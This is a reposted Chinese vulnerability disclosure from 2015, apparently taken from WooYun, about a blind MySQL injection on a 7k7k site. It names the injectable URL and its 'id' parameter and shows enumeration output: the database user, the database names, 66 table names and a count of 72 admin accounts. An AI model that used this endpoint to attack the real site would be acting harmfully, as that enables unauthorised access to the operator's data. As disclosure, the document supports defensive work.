记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

7k7k某站点MySQL盲注

2015-05-26 04:25
漏洞标题 7k7k某站点MySQL盲注
相关厂商 奇客星空
漏洞作者 路人甲
提交时间 2015-05-20 21:13
公开时间 2015-05-25 21:14
漏洞类型 SQL注射漏洞
危害等级
自评Rank 6
漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞
Tags标签

漏洞详情

注射点:

code 区域
http://h.7k7k.com/?action=ajaxrecommend&callback=jsonp2&id=654

参数 id可注入。

漏洞证明:

code 区域
current user:    '[email protected] %.%'
current database: 'nt_game'
available databases [5]:
[*] information_schema
[*] nt_comment
[*] nt_game
[*] nt_gift
[*] nt_mobile_config
Database: nt_game
[66 tables]
+----------------------------+
| 7k7k_mobile_client_version |
| version |
| admin |
| adminmanager |
| agent |
| album |
| album_relation |
| archives |
| bak_1212b_game_u |
| bak_1226_game_detail_u |
| biggame |
| biggame_detail |
| brand |
| brand_relation |
| category |
| channel |
| channel_package |
| checkdown |
| codes |
| compare |
| compare_copy |
| compare_dangle |
| compare_dangle_copy |
| compare_dangle_wuxian |
| content |
| correspondence |
| dev_edit |
| developer |
| feedback |
| game |
| game_delete |
| game_detail |
| game_detail_two |
| game_detail_u |
| game_lation |
| game_lation_bak_copy |
| game_lation_copy |
| game_rela_master |
| game_relation |
| game_status |
| game_two |
| game_u |
| gift |
| goitunes |
| keyword_search |
| log |
| mobile_client_version |
| mobilestore |
| p3View |
| p4View |
| pc_client_version |
| phone_model |
| pm_message |
| pro_category |
| pro_relation |
| rela_flash |
| special |
| tag |
| tag_relation |
| tags |
| tags_relation |
| tmp_guan |
| tmp_list |
| tui_tmp |
| web_setting |
| web_setting_f |
+----------------------------+
有72个管理员帐号
Database: nt_game
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 72 |
+-------+---------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云

转载请注明:安全脉搏 » 7k7k某站点MySQL盲注

知识来源: www.secpulse.com/archives/32315.html
想收藏或者和大家分享这篇好文章→复制链接地址

“7k7k某站点MySQL盲注”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云